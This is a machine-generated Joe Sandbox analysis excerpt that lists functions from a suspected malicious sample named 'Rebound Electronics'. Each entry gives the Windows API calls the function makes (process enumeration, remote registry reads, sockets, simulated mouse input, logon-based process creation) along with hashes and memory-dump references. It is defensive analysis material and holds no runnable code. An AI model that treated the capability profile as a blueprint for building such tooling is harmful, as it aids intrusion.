Instruction Fuzzy Hash: 121190B1150219BFEF155F60CC85EEB7F6DFF09798F014115BA09A60A0C6729C21DBA4

Function 00C3CCCD Relevance: 9.3, APIs: 6, Instructions: 253COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00C3CCF6
GetWindowRect.USER32(?,?), ref: 00C3CD37
ScreenToClient.USER32(?,?), ref: 00C3CD5F
GetClientRect.USER32(?,?), ref: 00C3CE8C
GetWindowRect.USER32(?,?), ref: 00C3CEA5

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: 4686ba6088e044d851111684708d93a6a78c9ab641ce9cd414084d06207e468b
Instruction ID: b6b329b20bd17011172d2765302ef3ec43e41ff2e04cbc57ce7ced628e794f10
Opcode Fuzzy Hash: 4686ba6088e044d851111684708d93a6a78c9ab641ce9cd414084d06207e468b
Instruction Fuzzy Hash: BFB17C79A10249DBDF10CFA9C4847EEBBB1FF08300F149529EC69EB255DB30AA50DB64

Function 00C81BDF Relevance: 9.2, APIs: 6, Instructions: 163processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00C81C18
Process32FirstW.KERNEL32(00000000,?), ref: 00C81C26
__wsplitpath.LIBCMT ref: 00C81C54

Part of subcall function 00C41DFC: __wsplitpath_helper.LIBCMT ref: 00C41E3C

_wcscat.LIBCMT ref: 00C81C69
Process32NextW.KERNEL32(00000000,?), ref: 00C81CDF
CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00C81CF1

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
String ID:
API String ID: 1380811348-0
Opcode ID: 8e482a177cd5442b24d9a0345d479bab5922797ccabc2e16e300b322b30e594a
Instruction ID: c7a135f44df563eb506403e94cf965f2a4dc75892323d30077e587f4431c7700
Opcode Fuzzy Hash: 8e482a177cd5442b24d9a0345d479bab5922797ccabc2e16e300b322b30e594a
Instruction Fuzzy Hash: E7516BB11043009FD720EF24D885FAFB7ECAF88754F04491EF98A97251EB70AA05DB92

Function 00C82FD6 Relevance: 9.2, APIs: 6, Instructions: 160registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C83C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C82BB5,?,?), ref: 00C83C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C830AF
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C830EF
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00C83112
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00C8313B
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00C8317E
RegCloseKey.ADVAPI32(00000000), ref: 00C8318B

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 3451389628-0
Opcode ID: 477581766e7bf2f63efc3f673c06f2a03fdb5c4f32d51c32a455b9e9b4cda91a
Instruction ID: 575313de59cc8598c39fc0645988a3b773a2f61756174e3368898d0f1cabba4e
Opcode Fuzzy Hash: 477581766e7bf2f63efc3f673c06f2a03fdb5c4f32d51c32a455b9e9b4cda91a
Instruction Fuzzy Hash: E1517831208350AFC704EF64C885E6EBBE9FF89B04F04491DF996872A1DB71EA05DB56

Function 00C884DE Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00C88540
GetMenuItemCount.USER32(00000000), ref: 00C88577
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00C8859F
GetMenuItemID.USER32(?,?), ref: 00C8860E
GetSubMenu.USER32(?,?), ref: 00C8861C
PostMessageW.USER32(?,00000111,?,00000000), ref: 00C8866D

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: 609ac0e09d208be14a3442f906b73c54dfd50f3cdc9d27afb3c874f71bb7e42d
Instruction ID: fc8fb108cc136961c115f3e11c1576fdd93374d61b86724fe2cd8276c232961d
Opcode Fuzzy Hash: 609ac0e09d208be14a3442f906b73c54dfd50f3cdc9d27afb3c874f71bb7e42d
Instruction Fuzzy Hash: C6519C71E00224AFDF11EFA4C881AAEB7F4EF48314F104459F916BB751DB30AE459B99

Function 00C64AC2 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C64B10
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C64B5B
IsMenu.USER32(00000000), ref: 00C64B7B
CreatePopupMenu.USER32 ref: 00C64BAF
GetMenuItemCount.USER32(000000FF), ref: 00C64C0D
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00C64C3E

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: b5a317c86ba71da350486a71e0ea446ecec45d271447e363104a01264e57d0a7
Instruction ID: 1c84fc9abb798534cf4b4f7a3ce6dd53b8757b5c5a00e319a977fe81a0f9587b
Opcode Fuzzy Hash: b5a317c86ba71da350486a71e0ea446ecec45d271447e363104a01264e57d0a7
Instruction Fuzzy Hash: 4751CC70A01609EFCF39CF68C8C8BAEBBF5BF45318F148159E5269B291E7709A44CB51

Function 00C78DE2 Relevance: 9.1, APIs: 6, Instructions: 136networkCOMMON

Download Yara Rule

APIs

select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,00CBDC00), ref: 00C78E7C
WSAGetLastError.WSOCK32(00000000), ref: 00C78E89
__WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00C78EAD
#16.WSOCK32(?,?,00000000,00000000), ref: 00C78EC5
_strlen.LIBCMT ref: 00C78EF7
WSAGetLastError.WSOCK32(00000000), ref: 00C78F6A

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: ErrorLast$_strlenselect
String ID:
API String ID: 2217125717-0
Opcode ID: 203cb7a7e9999e9b0baa360cb1ddd3ed5413e30c5d867d18ccab634dbd83cacb
Instruction ID: 7df7ececa699eacd2519e268f5ebe64c7efa34d724e32fcfee4ebb6bdf5f7a02
Opcode Fuzzy Hash: 203cb7a7e9999e9b0baa360cb1ddd3ed5413e30c5d867d18ccab634dbd83cacb
Instruction Fuzzy Hash: 0D41C371500204AFCB18EBA4DD89FAEB7B9AF58314F108159F62AD76D1DF30AE44DB20

Function 00C3ABF5 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00C3B34E: GetWindowLongW.USER32(?,000000EB), ref: 00C3B35F

BeginPaint.USER32(?,?,?), ref: 00C3AC2A
GetWindowRect.USER32(?,?), ref: 00C3AC8E
ScreenToClient.USER32(?,?), ref: 00C3ACAB
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00C3ACBC
EndPaint.USER32(?,?,?,?,?), ref: 00C3AD06
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00C9E673

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
String ID:
API String ID: 2592858361-0
Opcode ID: 25155ec6b1171db37bac4125c83d48aa1e24c44989ee2ca03423dc875d057b5e
Instruction ID: 89c5d47de188e19d6484f7a5f33c3b796d5c35837cf06f02a47f34ea82334981
Opcode Fuzzy Hash: 25155ec6b1171db37bac4125c83d48aa1e24c44989ee2ca03423dc875d057b5e
Instruction Fuzzy Hash: 4641D4701043049FCB10DF24DC88FBA7BF8FB59724F180669F9A58B2A1D7319955DB62

Function 00C8E397 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(00CE1628,00000000,00CE1628,00000000,00000000,00CE1628,?,00C9DC5D,00000000,?,00000000,00000000,00000000,?,00C9DAD1,00000004), ref: 00C8E40B
EnableWindow.USER32(00000000,00000000), ref: 00C8E42F
ShowWindow.USER32(00CE1628,00000000), ref: 00C8E48F
ShowWindow.USER32(00000000,00000004), ref: 00C8E4A1
EnableWindow.USER32(00000000,00000001), ref: 00C8E4C5
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00C8E4E8

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: e00585914ed6b0c956390ffc209544ac35c04bb90388763a87eb950c0a0ab43b
Instruction ID: 302d0e7105af0c0ade22011932157a30a96d945b9bf478de04f7f69d2c22e32a
Opcode Fuzzy Hash: e00585914ed6b0c956390ffc209544ac35c04bb90388763a87eb950c0a0ab43b
Instruction Fuzzy Hash: 04419031601140EFDB26DF64C489F947BE0BF49308F1885A9FA6D8F2A2C731EA45CB55

Function 00C698BA Relevance: 9.1, APIs: 6, Instructions: 100fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 00C698D1

Part of subcall function 00C3F4EA: std::exception::exception.LIBCMT ref: 00C3F51E
Part of subcall function 00C3F4EA: __CxxThrowException@8.LIBCMT ref: 00C3F533

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00C69908
EnterCriticalSection.KERNEL32(?), ref: 00C69924
LeaveCriticalSection.KERNEL32(?), ref: 00C6999E
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00C699B3
InterlockedExchange.KERNEL32(?,000001F6), ref: 00C699D2

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 2537439066-0
Opcode ID: efa36b92e7496384568b05a0f062a86ffb08a12bd115d525c4fc9682ee2fafdd
Instruction ID: 0dd02e20d66618ab2b3106960727830c418611c466e8edae7a6fffb8fb25d665
Opcode Fuzzy Hash: efa36b92e7496384568b05a0f062a86ffb08a12bd115d525c4fc9682ee2fafdd
Instruction Fuzzy Hash: 18315E31900205EBDB10AFA4DC85BAEB778FF85710F1480A9E905AB246D774DE11DBA0

Function 00C79B45 Relevance: 9.1, APIs: 6, Instructions: 99COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,00C777F4,?,?,00000000,00000001), ref: 00C79B53

Part of subcall function 00C76544: GetWindowRect.USER32(?,?), ref: 00C76557

GetDesktopWindow.USER32 ref: 00C79B7D
GetWindowRect.USER32(00000000), ref: 00C79B84
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00C79BB6

Part of subcall function 00C67A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00C67AD0

GetCursorPos.USER32(?), ref: 00C79BE2
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00C79C44

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: c787c94a6802fc2f3c2af048c3d6730ae42a2b0c30da7561dfd01c29212929c0
Instruction ID: 2c0be4ed5754f007dde9606f31c2ef221b74422eb60186098acc63f7086d8860
Opcode Fuzzy Hash: c787c94a6802fc2f3c2af048c3d6730ae42a2b0c30da7561dfd01c29212929c0
Instruction Fuzzy Hash: C631CF72504309ABD720DF54D849F9EB7E9FF89318F00091AF59AE7191DA31EA48CB92

Function 00C5AF64 Relevance: 9.1, APIs: 6, Instructions: 73processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00C5AFAE
OpenProcessToken.ADVAPI32(00000000), ref: 00C5AFB5
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00C5AFC4
CloseHandle.KERNEL32(00000004), ref: 00C5AFCF
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00C5AFFE
DestroyEnvironmentBlock.USERENV(00000000), ref: 00C5B012

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: b13956196c68dbe5401fed696e21f771aec80d672c7d2c634f14c134ca4d5f4b
Instruction ID: 24ee6c13e8cb20edc0e5bceb0cb0982e29f91678dc9ac7ce1c3d4f748cf5190a
Opcode Fuzzy Hash: b13956196c68dbe5401fed696e21f771aec80d672c7d2c634f14c134ca4d5f4b
Instruction Fuzzy Hash: A2218EB610020DAFCF028F95DD09FAE7BA9EF4530AF044115FE02A2161C3769EA4EB65

Function 00C8EBF6 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00C3AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00C3AFE3
Part of subcall function 00C3AF83: SelectObject.GDI32(?,00000000), ref: 00C3AFF2
Part of subcall function 00C3AF83: BeginPath.GDI32(?), ref: 00C3B009
Part of subcall function 00C3AF83: SelectObject.GDI32(?,00000000), ref: 00C3B033

MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00C8EC20
LineTo.GDI32(00000000,00000003,?), ref: 00C8EC34
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00C8EC42
LineTo.GDI32(00000000,00000000,?), ref: 00C8EC52
EndPath.GDI32(00000000), ref: 00C8EC62
StrokePath.GDI32(00000000), ref: 00C8EC72

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 06db8ce386c64ef7744875ddc6c964af54d3f2d3e9e045eaa53d9ff53528c284
Instruction ID: bd60164e4c6ff4e401c4fcdb3d1d8e070b75496bb2d545f1330351487f094e8a
Opcode Fuzzy Hash: 06db8ce386c64ef7744875ddc6c964af54d3f2d3e9e045eaa53d9ff53528c284
Instruction Fuzzy Hash: 87110972400149BFEB029F90DD88FEE7F6DEB09354F048112BE1A8A160D7719E55DBA0

Function 00C5E19B Relevance: 9.0, APIs: 6, Instructions: 48COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00C5E1C0
GetDeviceCaps.GDI32(00000000,00000058), ref: 00C5E1D1
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C5E1D8
ReleaseDC.USER32(00000000,00000000), ref: 00C5E1E0
MulDiv.KERNEL32(000009EC,?,00000000), ref: 00C5E1F7
MulDiv.KERNEL32(000009EC,?,?), ref: 00C5E209

Part of subcall function 00C59AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00C59A05,00000000,00000000,?,00C59DDB), ref: 00C5A53A

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: CapsDevice$ExceptionRaiseRelease
String ID:
API String ID: 603618608-0
Opcode ID: 1d2fc60dd088a4b15a137b3fd9805530b25b0ae92dbf438409f83e65f8708a77
Instruction ID: 06e8f66e937987470d9b4ef7927da4ee281a0345f018151f1334cc8b3479cfd4
Opcode Fuzzy Hash: 1d2fc60dd088a4b15a137b3fd9805530b25b0ae92dbf438409f83e65f8708a77
Instruction Fuzzy Hash: F9018FB5A40614BFEB109FA68C45B5EBFB8EB49355F008066FE06A7291D6709D01CFA0

Function 00C47B47 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 00C47B47

Part of subcall function 00C4123A: __initp_misc_winsig.LIBCMT ref: 00C4125E
Part of subcall function 00C4123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00C47F51
Part of subcall function 00C4123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00C47F65
Part of subcall function 00C4123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00C47F78
Part of subcall function 00C4123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00C47F8B
Part of subcall function 00C4123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00C47F9E
Part of subcall function 00C4123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00C47FB1
Part of subcall function 00C4123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00C47FC4
Part of subcall function 00C4123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00C47FD7
Part of subcall function 00C4123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00C47FEA
Part of subcall function 00C4123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00C47FFD
Part of subcall function 00C4123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00C48010
Part of subcall function 00C4123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00C48023
Part of subcall function 00C4123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00C48036
Part of subcall function 00C4123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00C48049
Part of subcall function 00C4123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00C4805C
Part of subcall function 00C4123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00C4806F

__mtinitlocks.LIBCMT ref: 00C47B4C

Part of subcall function 00C47E23: InitializeCriticalSectionAndSpinCount.KERNEL32(00CDAC68,00000FA0,?,?,00C47B51,00C45E77,00CD6C70,00000014), ref: 00C47E41

__mtterm.LIBCMT ref: 00C47B55

Part of subcall function 00C47BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00C47B5A,00C45E77,00CD6C70,00000014), ref: 00C47D3F
Part of subcall function 00C47BBD: _free.LIBCMT ref: 00C47D46
Part of subcall function 00C47BBD: DeleteCriticalSection.KERNEL32(00CDAC68,?,?,00C47B5A,00C45E77,00CD6C70,00000014), ref: 00C47D68

__calloc_crt.LIBCMT ref: 00C47B7A
GetCurrentThreadId.KERNEL32 ref: 00C47BA3

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
String ID:
API String ID: 2942034483-0
Opcode ID: 0ab893529aec5253d8b16478a573b8ccf0a87095cbbbccb6bd45ba10558bb2ba
Instruction ID: d0af508f1001724cc29aa16861278d0330efd76335968daab14f727902a5cadf
Opcode Fuzzy Hash: 0ab893529aec5253d8b16478a573b8ccf0a87095cbbbccb6bd45ba10558bb2ba
Instruction Fuzzy Hash: 19F0903211D3521EEA287B347C06B5A2B84FF02734B200BAAF9A4D55D2FF208941A5A1

Function 00C227EC Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00C2281D
MapVirtualKeyW.USER32(00000010,00000000), ref: 00C22825
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00C22830
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00C2283B
MapVirtualKeyW.USER32(00000011,00000000), ref: 00C22843
MapVirtualKeyW.USER32(00000012,00000000), ref: 00C2284B

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

